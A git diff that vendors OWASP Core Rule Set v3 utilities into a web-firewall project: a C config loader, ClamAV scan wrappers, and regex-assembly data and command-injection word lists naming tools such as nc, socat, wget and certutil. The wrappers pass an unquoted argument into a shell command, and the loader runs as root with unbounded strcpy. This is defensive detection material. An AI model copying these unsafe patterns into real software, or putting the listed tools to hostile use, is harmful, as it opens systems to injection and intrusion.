find_param_idx("MODSEC_PROXY_EXCHANGE",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_exchange,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_EXT_IPS",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_ext_ips,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_MUI_UI_ADMIN",parameters,num_of_params)) >= 0) + strcpy(modsec_mui_ui_admin,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_PASSWORD_FILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_password_file,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_MUI_UI_IPADDRESS",parameters,num_of_params)) >= 0) + strcpy(modsec_mui_ui_ipaddress,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_MUI_UI_PORT",parameters,num_of_params)) >= 0) + strcpy(modsec_mui_ui_port,parameters[idx].value); + + if ((idx = find_param_idx("SENSOR_ID",parameters,num_of_params)) >= 0) + strcpy(sensor_id,parameters[idx].value); + + if ((idx = find_param_idx("SERIAL",parameters,num_of_params)) >= 0) + strcpy(serial,parameters[idx].value); + + if ((idx = find_param_idx("VERSION_NUMBER",parameters,num_of_params)) >= 0) + strcpy(version_number,parameters[idx].value); + + if ((idx = find_param_idx("RELEASE_DATE",parameters,num_of_params)) >= 0) + strcpy(release_date,parameters[idx].value); + + if ((idx = find_param_idx("BRIDGE_MODE",parameters,num_of_params)) >= 0) + strcpy(bridge_mode,parameters[idx].value); + + if ((idx = find_param_idx("DATA_DISK_SPACE",parameters,num_of_params)) >= 0) + strcpy(data_disk_space,parameters[idx].value); + + if ((idx = find_param_idx("CONN_RATE",parameters,num_of_params)) >= 0) + strcpy(conn_rate,parameters[idx].value); + + if ((idx = find_param_idx("CONN_RATE_PER_ADDR",parameters,num_of_params)) >= 0) + strcpy(conn_rate_per_addr,parameters[idx].value); + + if ((idx = find_param_idx("CONNS",parameters,num_of_params)) >= 0) + strcpy(conns,parameters[idx].value); + + if ((idx = find_param_idx("CONNS_PER_ADDR",parameters,num_of_params)) >= 0) + strcpy(conns_per_addr,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_SCRIPT",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_script,parameters[idx].value); + + return num_of_params; +} + +int init_cgi() +{ + char *modsec; + + setresuid(0,0,0); + setresgid(0,0,0); + + strcpy(modsec_cli_home,"/opt/modsecurity-cli"); + strcpy(modsec_rpc_home,"/opt/modsecurity-rpc"); + strcpy(modsec_rpc_log_file,"/opt/modsecurity-rpc/var/logs/rpc.log"); + strcpy(modsec_rpc_log_level,"0"); + strcpy(modsec_rpc_ssl_lockfile,"/opt/modsecurity-rpc/var/run/ssl.lock"); + strcpy(modsec_rpc_sensor_lockfile,"/opt/modsecurity-rpc/var/run/sensor.lock"); + strcpy(modsec_rpc_externalnic_lockfile,"/opt/modsecurity-rpc/var/run/externalnic.lock"); + strcpy(modsec_rpc_reverseproxy_lockfile,"/opt/modsecurity-rpc/var/run/reverseproxy.lock"); + strcpy(modsec_rpc_mui_lockfile,"/opt/modsecurity-rpc/var/run/mui.lock"); + strcpy(modsec_proxy_home,"/opt/modsecurity-proxy"); + strcpy(modsec_proxy_ip,"127.0.0.2"); + strcpy(modsec_proxy_port,"80"); + strcpy(modsec_proxy_bin,"/bin/modsec-proxyd"); + strcpy(modsec_proxy_script,"/etc/init.d/modsec-proxy"); + strcpy(modsec_proxy_conf,"/etc/httpd.conf"); + strcpy(modsec_proxy_ext_nic,"eth0"); + strcpy(modsec_proxy_network_prefix,"172.16.0.0/12"); + strcpy(modsec_proxy_pid,"/opt/modsecurity-proxy/var/run/httpd.pid"); + strcpy(modsec_proxy_whitelist,"/opt/breach/etc/modsec_whitelist.conf"); + strcpy(modsec_proxy_blacklist,"/opt/breach/etc/modsec_blacklist.conf"); + strcpy(modsec_proxy_timeout,"120"); + strcpy(modsec_proxy_exchange,"/opt/modsecurity-proxy/var/exchange"); + strcpy(modsec_proxy_ext_ips,"/opt/breach/etc/modsec_ips.conf"); + strcpy(modsec_mui_ui_ipaddress,"127.0.0.1"); + strcpy(modsec_mui_ui_port,"443"); + strcpy(modsec_rpc_password_file,"/opt/modsecurity-rpc/etc/.htpasswd"); + strcpy(modsec_mui_ui_admin,"admin"); + strcpy(sensor_id,"1"); + strcpy(serial,"1"); + strcpy(version_number,"2.0"); + strcpy(bridge_mode,"off"); + strcpy(data_disk_space,"60"); + strcpy(release_date,"11-15-2006"); + strcpy(conn_rate,"0"); + strcpy(conn_rate_per_addr,"0"); + strcpy(conns,"0"); + strcpy(conns_per_addr,"0"); + + if (modsec = getenv("MODSEC")) + read_conf_file(modsec); + else { + if (!read_conf_file("/opt/breach/etc/modsec.conf")) + read_conf_file("/etc/modsec.conf"); + } + + return 0; +} diff --git a/src/common/core/modsecurity/files/coreruleset/util/av-scanning/runAV/common.h b/src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/common.h similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/av-scanning/runAV/common.h rename to src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/common.h diff --git a/src/common/core/modsecurity/files/coreruleset/util/av-scanning/runAV/comp b/src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/comp similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/av-scanning/runAV/comp rename to src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/comp diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/runAV-clamd.c b/src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/runAV-clamd.c new file mode 100755 index 000000000..83319fdca --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/runAV-clamd.c @@ -0,0 +1,48 @@ +#include "common.h" + +main(int argc, char *argv[]) +{ + char cmd[MAX_OUTPUT_SIZE]; + char output[MAX_OUTPUT_SIZE]; + int error; + char *colon; + char *keyword; + + if (argc > 1) { + sprintf (cmd, "/usr/bin/clamdscan --no-summary %s", argv[1]); + output[0] = '\0'; + error = run_cmd(cmd,output,MAX_OUTPUT_SIZE); + if (error != 0) { + printf ("1 exec error %d: OK", error); + } else if (!*output) { + printf ("1 exec empty: OK"); + } + else { + colon = strstr(output, ":"); + if (colon) { colon += 2; } + if (!colon) { + printf ("0 unable to parse clamdscan output [%s] for cmd [%s]", output, cmd); + } + else if (keyword = strstr(colon, " FOUND")) { + *keyword = '\0'; + printf ("0 clamdscan: %s", colon); + } + else if (keyword = strstr(colon, " ERROR")) { + *keyword = '\0'; + printf ("0 clamdscan: %s", colon); + } + else if (keyword = strstr(colon, "OK")) { + printf ("1 clamdscan: OK"); + } + else if (keyword = strstr(colon, "Empty file")) { + printf ("1 empty file"); + } + else if (keyword = strstr(colon, "Can't access file ")) { + printf ("0 invalid file %s", keyword+18); + } + else { + printf ("0 unable to parse clamdscan output [%s] for cmd [%s]", output, cmd); + } + } + } +} diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/runAV.c b/src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/runAV.c new file mode 100755 index 000000000..1bbf76307 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/runAV.c @@ -0,0 +1,48 @@ +#include "common.h" + +main(int argc, char *argv[]) +{ + char cmd[MAX_OUTPUT_SIZE]; + char output[MAX_OUTPUT_SIZE]; + int error; + char *colon; + char *keyword; + + if (argc > 1) { + sprintf (cmd, "/usr/bin/clamscan --no-summary %s", argv[1]); + output[0] = '\0'; + error = run_cmd(cmd,output,MAX_OUTPUT_SIZE); + if (error != 0) { + printf ("1 exec error %d: OK", error); + } else if (!*output) { + printf ("1 exec empty: OK"); + } + else { + colon = strstr(output, ":"); + if (colon) { colon += 2; } + if (!colon) { + printf ("0 unable to parse clamscan output [%s] for cmd [%s]", output, cmd); + } + else if (keyword = strstr(colon, " FOUND")) { + *keyword = '\0'; + printf ("0 clamscan: %s", colon); + } + else if (keyword = strstr(colon, " ERROR")) { + *keyword = '\0'; + printf ("0 clamscan: %s", colon); + } + else if (keyword = strstr(colon, "OK")) { + printf ("1 clamscan: OK"); + } + else if (keyword = strstr(colon, "Empty file")) { + printf ("1 empty file"); + } + else if (keyword = strstr(colon, "Can't access file ")) { + printf ("0 invalid file %s", keyword+18); + } + else { + printf ("0 unable to parse clamscan output [%s] for cmd [%s]", output, cmd); + } + } + } +} diff --git a/src/common/core/modsecurity/files/coreruleset/util/av-scanning/runav.pl b/src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runav.pl similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/av-scanning/runav.pl rename to src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runav.pl diff --git a/src/common/core/modsecurity/files/coreruleset/util/browser-tools/js-overrides.js b/src/common/core/modsecurity/files/coreruleset-v3/util/browser-tools/js-overrides.js similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/browser-tools/js-overrides.js rename to src/common/core/modsecurity/files/coreruleset-v3/util/browser-tools/js-overrides.js diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs2-renumbering/IdNumbering.csv b/src/common/core/modsecurity/files/coreruleset-v3/util/crs2-renumbering/IdNumbering.csv similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/crs2-renumbering/IdNumbering.csv rename to src/common/core/modsecurity/files/coreruleset-v3/util/crs2-renumbering/IdNumbering.csv diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs2-renumbering/README b/src/common/core/modsecurity/files/coreruleset-v3/util/crs2-renumbering/README similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/crs2-renumbering/README rename to src/common/core/modsecurity/files/coreruleset-v3/util/crs2-renumbering/README diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs2-renumbering/update.py b/src/common/core/modsecurity/files/coreruleset-v3/util/crs2-renumbering/update.py similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/crs2-renumbering/update.py rename to src/common/core/modsecurity/files/coreruleset-v3/util/crs2-renumbering/update.py diff --git a/src/common/core/modsecurity/files/coreruleset/util/geo-location/README b/src/common/core/modsecurity/files/coreruleset-v3/util/geo-location/README similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/geo-location/README rename to src/common/core/modsecurity/files/coreruleset-v3/util/geo-location/README diff --git a/src/common/core/modsecurity/files/coreruleset/util/honeypot-sensor/README.md b/src/common/core/modsecurity/files/coreruleset-v3/util/honeypot-sensor/README.md similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/honeypot-sensor/README.md rename to src/common/core/modsecurity/files/coreruleset-v3/util/honeypot-sensor/README.md diff --git a/src/common/core/modsecurity/files/coreruleset/util/honeypot-sensor/mlogc-honeypot-sensor.conf b/src/common/core/modsecurity/files/coreruleset-v3/util/honeypot-sensor/mlogc-honeypot-sensor.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/honeypot-sensor/mlogc-honeypot-sensor.conf rename to src/common/core/modsecurity/files/coreruleset-v3/util/honeypot-sensor/mlogc-honeypot-sensor.conf diff --git a/src/common/core/modsecurity/files/coreruleset/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf b/src/common/core/modsecurity/files/coreruleset-v3/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf rename to src/common/core/modsecurity/files/coreruleset-v3/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf diff --git a/src/common/core/modsecurity/files/coreruleset/util/id-range b/src/common/core/modsecurity/files/coreruleset-v3/util/id-range similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/id-range rename to src/common/core/modsecurity/files/coreruleset-v3/util/id-range diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/join-multiline-rules/join.py b/src/common/core/modsecurity/files/coreruleset-v3/util/join-multiline-rules/join.py new file mode 100755 index 000000000..95c96c2b1 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/join-multiline-rules/join.py @@ -0,0 +1,47 @@ +#!/usr/bin/env python +# +# This script reads all the rule files passed on the command line, +# and outputs them, with each (multi-line) directive joined as a +# single line. +# +# This can be used to work around a bug in Apache < 2.4.11 in +# parsing long configuration directives. +# +# Usage: +# +# util/join-multiline-rules/join.py rules/*.conf > rules/rules.conf.joined +# +# This produces a single 'rules.conf.joined' file that can be included +# in buggy Apache versions. It is recommended to keep this file in the +# rules/ directory (because it refers to .data files in that directory) +# but give it a name not ending in .conf (so the file will not be +# included in *.conf and you can re-run the command multiple times +# without including its own output). +# +# Example: +# +# SecRule &TX:paranoia_level "@eq 0" \ +# "id:901120,\ +# phase:1,\ +# pass,\ +# nolog,\ +# setvar:tx.paranoia_level=1" +# +# will be outputted as: +# +# SecRule &TX:paranoia_level "@eq 0" "id:901120,phase:1,pass,nolog,setvar:tx.paranoia_level=1" +# + +import fileinput, sys + +for line in fileinput.input(): + line = line.strip() + if line == '': + sys.stdout.write("\n") + continue + + if line[-1] == '\\': + sys.stdout.write(line[0:-1]) + else: + sys.stdout.write(line) + sys.stdout.write("\n") diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/920600.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/920600.data new file mode 100644 index 000000000..26baeb2bd --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/920600.data @@ -0,0 +1,101 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regexp_assemble/. + +##! The expression generated from this file matches a full HTTP +##! `Accept` header by following the specification as far as +##! necessary, while restricting the `charset` parameter +##! to a list of explicitly allowed values. +##! Where possible, the expression matches tokens "loosely", +##! to reduce complexity and the risk of false positives. + +##! Specifications: +##! https://httpwg.org/specs/rfc7231.html#request.conneg +##! https://httpwg.org/specs/rfc7230.html + +##!^ ^ +##!$ $ + +##! Helpers +##!> template non-token-with-dquote-chars (),/:;<=>?![\x5c\]{} + +##!> template non-token-chars \"{{non-token-with-dquote-chars}} + +##!> template token-chars [^{{non-token-chars}}] + +##!> template token-with-dquote-chars [^{{non-token-with-dquote-chars}}] + +##!> template type-subtype (?:\*|{{token-chars}}+) + +##!> template media-type {{type-subtype}}/{{type-subtype}} + +##! list of allowed charsets + ##!> assemble +(?:"? + ##!=> + ##!> include allowed-charsets + ##!=> +\b"?)) + ##!=< allowed-charsets + ##!< + + +##! Main assembly + ##!> assemble +(?:{{media-type}}) + ##!=> +(?:\s*+;\s*+ + ##!=> +(?:(?:charset\s*+=\s*+ + ##!=> + ##!=> allowed-charsets + + ##! If the first part wasn't a "charset", then + ##! anything is allowed here that is not "charset". + ##! Note that this doesn't follow the RFC strictly. +|(?: + ##!=> +[^c{{non-token-chars}}]{{token-chars}}* +c[^h{{non-token-chars}}]{{token-chars}}* +ch[^a{{non-token-chars}}]{{token-chars}}* +cha[^r{{non-token-chars}}]{{token-chars}}* +char[^s{{non-token-chars}}]{{token-chars}}* +chars[^e{{non-token-chars}}]{{token-chars}}* +charse[^t{{non-token-chars}}]{{token-chars}}* + ##!=> +)\s*+=\s*+{{token-with-dquote-chars}}+) + ##! Clients like to violate the RFC, be lenient with + ##! terminating semi-colons. +;? + ##!=> +)* + ##!=> + + ##! Multiple "media-range" expressions can be + ##! specified, comma separated. +(?:\s*+,\s*+ + ##!=> +(?:{{media-type}}) + ##!=> +(?:\s*+;\s*+ + ##!=> +(?:(?:charset\s*+=\s*+ + ##!=> + ##!=> allowed-charsets +|(?: + ##!=> +[^c{{non-token-chars}}]{{token-chars}}* +c[^h{{non-token-chars}}]{{token-chars}}* +ch[^a{{non-token-chars}}]{{token-chars}}* +cha[^r{{non-token-chars}}]{{token-chars}}* +char[^s{{non-token-chars}}]{{token-chars}}* +chars[^e{{non-token-chars}}]{{token-chars}}* +charse[^t{{non-token-chars}}]{{token-chars}}* + ##!=> +)\s*+=\s*+{{token-with-dquote-chars}}+) + ##! Clients like to violate the RFC, be lenient with + ##! terminating semi-colons. +;? + ##!=> +)*)* + ##!=> + ##!< diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/921421.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/921421.data new file mode 100644 index 000000000..b2e0cff00 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/921421.data @@ -0,0 +1,17 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regexp_assemble/. + +##! Attacks attempting bypass by forcing JSON body processor leveraging recommended rule 200000 +##! Find Content-Type: application/x-www-form-urlencoded;boundary="application/json" +##! Find Content-Type: application/soap+xml;boundary="application/json" +^[^;\s,]+[;\s,].*?application\/json + +##! Attacks attempting bypass by forcing JSON body processor leveraging recommended rule 200006 +##! Find Content-Type: application/x-www-form-urlencoded;boundary="application/some.vendor+json" +##! Find Content-Type: application/soap+xml;boundary="application/some.vendor+json" +^[^;\s,]+[;\s,].*?application\/.+[+]json + +##! Attacks attempting bypass by forcing XML body processor leveraging recommended rule 200001 +##! Find Content-Type: application/x-www-form-urlencoded;boundary="application/xml" +##! Find Content-Type: application/json;boundary="application/soap+xml" +^[^;\s,]+[;\s,].*?(?:application(?:\/soap\+|\/)|text\/)xml diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/921422.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/921422.data new file mode 100644 index 000000000..7be243c33 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/921422.data @@ -0,0 +1,9 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regexp_assemble/. + +##! Attacks attempting to bypass content-type restrictions or behaviour +##! Find Content-Type: application/x-www-form-urlencoded;boundary="multipart/form-data" +##! Find Content-Type: application/soap-xml;boundary="multipart/form-data" +^[^;\s,]+[;\s,].*?\b(text|multipart|application)\b +^[^;\s,]+[;\s,].*?\b(audio|image|video|csv|css|vnd|pdf|plain|json|soap|xml|x-www-form-urlencoded|form-data|related|x-amf|octet|stream|csp|report)\b +^[^;\s,]+[;\s,].*?\b(\/|\+)\b diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/922110-chain1.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/922110-chain1.data new file mode 100644 index 000000000..0ea83ec0b --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/922110-chain1.data @@ -0,0 +1,105 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regexp_assemble/. + +##! The expression generated from this file matches a full HTTP +##! `Accept` header by following the specification as far as +##! necessary, while restricting the `charset` parameter +##! to a list of explicitly allowed values. +##! Where possible, the expression matches tokens "loosely", +##! to reduce complexity and the risk of false positives. + +##! Specifications: +##! https://httpwg.org/specs/rfc7231.html#request.conneg +##! https://httpwg.org/specs/rfc7230.html + +##! This is a duplicate of the 920600.data file. +##! There will be support for inclusion in the regexp_assemble tool in the future. +##! In the meantime, please keep both files in sync. + +##!^ ^ +##!$ $ + +##! Helpers +##!> template non-token-with-dquote-chars (),/:;<=>?![\x5c\]{} + +##!> template non-token-chars \"{{non-token-with-dquote-chars}} + +##!> template token-chars [^{{non-token-chars}}] + +##!> template token-with-dquote-chars [^{{non-token-with-dquote-chars}}] + +##!> template type-subtype (?:\*|{{token-chars}}+) + +##!> template media-type {{type-subtype}}/{{type-subtype}} + +##! list of allowed charsets + ##!> assemble +(?:"? + ##!=> + ##!> include allowed-charsets + ##!=> +\b"?)) + ##!=< allowed-charsets + ##!< + + +##! Main assembly + ##!> assemble +(?:{{media-type}}) + ##!=> +(?:\s*+;\s*+ + ##!=> +(?:(?:charset\s*+=\s*+ + ##!=> + ##!=> allowed-charsets + + ##! If the first part wasn't a "charset", then + ##! anything is allowed here that is not "charset". + ##! Note that this doesn't follow the RFC strictly. +|(?: + ##!=> +[^c{{non-token-chars}}]{{token-chars}}* +c[^h{{non-token-chars}}]{{token-chars}}* +ch[^a{{non-token-chars}}]{{token-chars}}* +cha[^r{{non-token-chars}}]{{token-chars}}* +char[^s{{non-token-chars}}]{{token-chars}}* +chars[^e{{non-token-chars}}]{{token-chars}}* +charse[^t{{non-token-chars}}]{{token-chars}}* + ##!=> +)\s*+=\s*+{{token-with-dquote-chars}}+) + ##! Clients like to violate the RFC, be lenient with + ##! terminating semi-colons. +;? + ##!=> +)* + ##!=> + + ##! Multiple "media-range" expressions can be + ##! specified, comma separated. +(?:\s*+,\s*+ + ##!=> +(?:{{media-type}}) + ##!=> +(?:\s*+;\s*+ + ##!=> +(?:(?:charset\s*+=\s*+ + ##!=> + ##!=> allowed-charsets +|(?: + ##!=> +[^c{{non-token-chars}}]{{token-chars}}* +c[^h{{non-token-chars}}]{{token-chars}}* +ch[^a{{non-token-chars}}]{{token-chars}}* +cha[^r{{non-token-chars}}]{{token-chars}}* +char[^s{{non-token-chars}}]{{token-chars}}* +chars[^e{{non-token-chars}}]{{token-chars}}* +charse[^t{{non-token-chars}}]{{token-chars}}* + ##!=> +)\s*+=\s*+{{token-with-dquote-chars}}+) + ##! Clients like to violate the RFC, be lenient with + ##! terminating semi-colons. +;? + ##!=> +)*)* + ##!=> + ##!< diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/include/allowed-charsets.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/include/allowed-charsets.data new file mode 100644 index 000000000..924451655 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/include/allowed-charsets.data @@ -0,0 +1,9 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regexp_assemble/. + +##! This list is in sync with the default value of tx.allowed_request_content_type_charset. + +iso-8859-1 +iso-8859-15 +utf-8 +windows-1252 diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932100.txt b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932100.txt new file mode 100644 index 000000000..f1cfb5760 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932100.txt @@ -0,0 +1,168 @@ +# Word list for rule 932100 (RCE Unix command injection part 1/3) +# +# To convert to a regexp that can be pasted into the rule: +# cat regexp-932100.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl +# +# Entries starting with ' are used verbatim. +# Everything after # is a comment. +# +# To prevent some FP for a command, you can require command parameters +# after a command. Only do this if the command regularly causes FP and if +# allowing the bare command (without parameters) is not too dangerous. +# (Note: due to \b following the regexp, a word boundary is also required +# further on, so some letter/number is needed for a match). Example: +# +# diff+ + +# Special regexp case for the '.' (source) command to prevent FP: +'\.\s.* + +7z +7za +7zr +adduser +alias+ +apt-get +arch+ +arp +awk+ +bash +batch+ +breaksw +bsdcat +bsdiff +bsdtar +builtin +bzcat +bzdiff +bzegrep +bzfgrep +bzgrep +bzip2 +bzless +bzmore +cat+ +cc+ +chattr +chdir+ +chflags +chmod +command+ +compress+ +coproc +cp+ +crontab +csh +curl +dash +dhclient +diff+ +dmesg +doas +done +dpkg +du+ +echo+ +egrep +endif +endsw +env +env-update +esac +eval +exec+ +expand +export +expr +fc+ +fetch+ +fgrep +fi +file+ +filetest +find+ +foreach +ftp+ +ftpstats +ftpwho +function +gcc+ +gdb +GET+ +getfacl+ +git+ +grep+ +gunzip +gzcat +gzip +head+ +history +hostid +hostname +htdigest +htpasswd +hup+ +# 'id' causes way too much FP, so we require whitespace; this will allow +# injecting ';id' unfortunately. +id+ +ifconfig +ip6tables +ipconfig +iptables +irb +irb1 +irb18 +irb19 +irb20 +irb21 +irb22 +java+ +jexec +jobs+ +kill+ +killall +last+ +lastcomm +lastlog +lastlogin +ldconfig +ldd+ +less+ +lessecho +lessfile +lesspipe +lftp +lftpget +ln+ +local+ +locate+ +logname +lp+ +ls +ls-F +lsb_release +lscpu +lshw +lsmod +lsof +lspci +lsusb +lwp-download +lwp-dump +lwp-mirror +lwp-request +lynx+ +lzcat +lzcmp +lzdiff +lzegrep +lzfgrep +lzgrep +lzless +lzma +lzmore +mailq +mailx+ +mkdir+ +mlocate +more+ diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932105.txt b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932105.txt new file mode 100644 index 000000000..e2bce2145 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932105.txt @@ -0,0 +1,174 @@ +# Word list for rule 932105 (RCE Unix command injection part 2/3) +# +# To convert to a regexp that can be pasted into the rule: +# cat regexp-932105.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl +# +# Entries starting with ' are used verbatim. +# Everything after # is a comment. +# +# To prevent some FP for a command, you can require command parameters +# after a command. Only do this if the command regularly causes FP and if +# allowing the bare command (without parameters) is not too dangerous. +# (Note: due to \b following the regexp, a word boundary is also required +# further on, so some letter/number is needed for a match). Example: +# +# diff+ + +mount+ +mutt+ +mv+ +mysql +mysqladmin +mysqldump +mysqldumpslow +mysqlhotcopy +mysqlshow +nano+ +nc+ +nc.openbsd +nc.traditional +ncat +net+ +netcat +netkit-ftp +netstat +nice+ +nmap +nohup +nping +nslookup +nstat +onintr +openssl +passwd +patch+ +perl +perl5 +perlsh +perms +pftp +pgrep +php +php5 +php7 +ping +pkexec +pkg +pkg_info +pkginfo +pkill +popd +printenv +printf+ +ps+ +ptar +ptardiff +ptargrep +pushd +python +python2 +python3 +python3m +rar+ +rcp+ +realpath +rename+ +repeat+ +replace+ +rm+ +rmdir+ +rmuser +rnano +route +rpm+ +rsync +ruby +ruby1 +ruby18 +ruby19 +ruby20 +ruby21 +ruby22 +sched +scp+ +sdiff +sed+ +sendmail +set+ +setenv +setfacl+ +setsid +sftp +sh+ +sh.distrib +shutdown +sleep +socat +sort+ +source+ +ssh +strings +su+ +sudo +svn +sysctl +tail +tailf +tar+ +tcping +tcptraceroute +tcsh +tee+ +telnet +time+ +timeout +top +touch+ +traceroute +traceroute6 +ulimit+ +uname +uncompress +unlink+ +unlzma +unrar +unset +unxz +unzip +useradd +userdel +usermod +vigr +vim+ +vipw +w3m +wget +# 'who' causes many FP, so require whitespace. +# Unfortunately, without whitespace it may still leak some info. +who+ +whoami +xargs +xterm +xxd+ +xz+ +xzcat +xzcmp +xzdec +xzdiff +xzegrep +xzfgrep +xzgrep +xzless +xzmore +yum +zcat +zcmp +zdiff +zegrep +zfgrep +zgrep +zip+ +zless +zmore +zrun +zsh diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932106.txt b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932106.txt new file mode 100644 index 000000000..138764fac --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932106.txt @@ -0,0 +1,26 @@ +# Word list for rule 932106 (RCE Unix command injection part 3/3) +# +# To convert to a regexp that can be pasted into the rule: +# cat regexp-932106.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl +# +# +# Entries starting with ' are used verbatim. +# Everything after # is a comment. +# +# To prevent some FP for a command, you can require command parameters +# after a command. Only do this if the command regularly causes FP and if +# allowing the bare command (without parameters) is not too dangerous. +# (Note: due to \b following the regexp, a word boundary is also required +# further on, so some letter/number is needed for a match). Example: +# +# diff+ + +vi+ +ps +pwd +who +w+ +aptitude+ +pacman+ +dnf+ +up2date+ diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932110.txt b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932110.txt new file mode 100644 index 000000000..b96466151 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932110.txt @@ -0,0 +1,164 @@ +# Word list for rule 932110 (RCE Windows command injection part 1/2) +# +# To convert to a regexp that can be pasted into the rule: +# cat regexp-932110.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl +# +# Entries starting with ' are used verbatim. +# Everything after # is a comment. +# +# To prevent some FP for a command, you can require command parameters +# after a command. Only do this if the command regularly causes FP and if +# allowing the bare command (without parameters) is not too dangerous. +# (Note: due to \b following the regexp, a word boundary is also required +# further on, so some letter/number is needed for a match). Example: +# +# diff@ + +7z +7za +7zr +addusers +admodcmd +arp@ +assoc +attrib +azman +bcdboot +bcdedit +bitsadmin +bootcfg +browstat +cacls +call@ +certreq +certutil +#disabled for FP: change +chdir@ +chkdsk +chkntfs +cipher +cleanmgr +clearmem +cluster +cmd +cmdkey +comexp +comp@ +compact@ +compmgmt +con2prt +convert +copy +csccmd +cscript +csvde +curl +date@ +dcomcnfg +debug +defrag +del@ +delprof +deltree +devcon +devmgmt +diff@ +dir@ +diruse +diskmgmt +diskpart +diskshadow +dnsstat +doskey +driverquery +dsacls +dsadd +dsget +dsmod +dsmove +dsquery +dsrm +dxdiag +echo +egrep +endlocal +erase +eventcreate +eventvwr +expand@ +explorer +fc@ +fgrep +find@ +findstr +foreach +forfiles +format@ +freedisk +fsmgmt +fsutil +ftp@ +ftype +gathernetworkinfo +getmac +git@ +gpedit +gpresult +gpupdate +hdwwiz +hostname 